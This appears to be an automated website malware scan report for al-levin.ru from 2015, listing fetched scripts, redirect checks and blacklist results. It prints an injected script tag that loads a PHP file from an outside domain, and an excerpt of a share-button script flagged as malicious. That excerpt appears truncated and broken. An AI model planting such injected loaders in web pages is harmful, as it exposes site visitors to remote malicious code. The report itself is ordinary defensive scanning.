Scanned pages/files
Request | Server response | Status |
http://al-levin.ru/ | 200 OK Content-Length: 38680 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://eurostandart-med.ru/mod/jquery/7bjgkfdt.php?id=4650964"></script> | ||
http://al-levin.ru/Scripts/AC_ActiveX.js | 200 OK Content-Length: 2095 Content-Type: application/x-javascript | suspicious |
http://al-levin.ru/Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 8056 Content-Type: application/x-javascript | suspicious |
http://odnaknopka.ru/ok3.js | 200 OK Content-Length: 2852 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function NewOdnaknopka3() {
this.domain=location.href+'/'; this.domain=this.domain.substr(this.domain.indexOf('://')+3); this.domain=this.domain.substr(0,this.domain.indexOf('/')); this.location=false; this.url=function(system) { var title=encodeURIComponent(document.title); var url=encodeURIComponent(location.href); switch (system) { case 1: return 'http://vkontakte.ru/share.php?url='+url; case 2: return 'http://www.facebook.com/sharer.php?u='+u } document.write(html); } } odnaknopka3=new NewOdnaknopka3(); odnaknopka3.init(); var js = document.createElement("script"); js.type = "text/javascript"; js.src = "http://odnaknopka.ru/stat.js"; document.body.appendChild(js); Antivirus reports:
| ||
http://cdn.connect.mail.ru/js/loader.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 03 Mar 2015 16:59:15 GMT Location: http://connect.mail.ru/js/loader.js Server: nginx Content-Length: 178 Content-Type: text/html X-Content-Type-Options: nosniff | clean |
http://connect.mail.ru/js/loader.js | 200 OK Content-Length: 6453 Content-Type: application/javascript | clean |
http://www.newsfiber.com/p/s/j?lang=rus&iv=4&r=5&is=60x60C&tl=100&dl=100&wp=1&ts=100%25&as=90%25&n=&y= | 200 OK Content-Length: 16692 Content-Type: application/x-javascript | clean |
http://counter.rambler.ru/top100.jcn?2761674 | 200 OK Content-Length: 6853 Content-Type: application/x-javascript | clean |
http://101widgets.com/02000219/170/175 | 200 OK Content-Length: 256 Content-Type: text/html | clean |
http://101widgets.com/test404page.js | 404 Not Found Content-Length: 88260 Content-Type: text/html | clean |
http://101widgets.com/js/jquery-2.1.1.min.js | 200 OK Content-Length: 84245 Content-Type: application/javascript | clean |
http://101widgets.com/js/jquery.smooth-scroll.min.js | 200 OK Content-Length: 2654 Content-Type: application/javascript | clean |
http://101widgets.com/js/bootstrap.min.js | 200 OK Content-Length: 28561 Content-Type: application/javascript | clean |
http://101widgets.com/js/jquery.imagesloaded.js | 200 OK Content-Length: 1560 Content-Type: application/javascript | clean |
http://101widgets.com/js/jquery.masonry.min.js | 200 OK Content-Length: 5492 Content-Type: application/javascript | clean |
http://101widgets.com/js/bootstrap-modalmanager.js | 200 OK Content-Length: 11397 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: al-levin.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 Mar 2015 16:59:14 GMT
Accept-Ranges: bytes
ETag: "1e3de8-9718-50f95bf163280"
Server: nginx/1.2.1
Vary: Accept-Encoding
Content-Length: 38680
Content-Type: text/html
Last-Modified: Sat, 21 Feb 2015 09:25:14 GMT
...38680 bytes of data.
GET / HTTP/1.1
Host: al-levin.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 Mar 2015 16:59:14 GMT
Accept-Ranges: bytes
ETag: "1e3de8-9718-50f95bf163280"
Server: nginx/1.2.1
Vary: Accept-Encoding
Content-Length: 38680
Content-Type: text/html
Last-Modified: Sat, 21 Feb 2015 09:25:14 GMT
...38680 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: al-levin.ru
Referer: http://www.google.com/search?q=al-levin.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: al-levin.ru
Referer: http://www.google.com/search?q=al-levin.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=al-levin.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://al-levin.ru/
Result: al-levin.ru is not infected or malware details are not published yet.
Result: al-levin.ru is not infected or malware details are not published yet.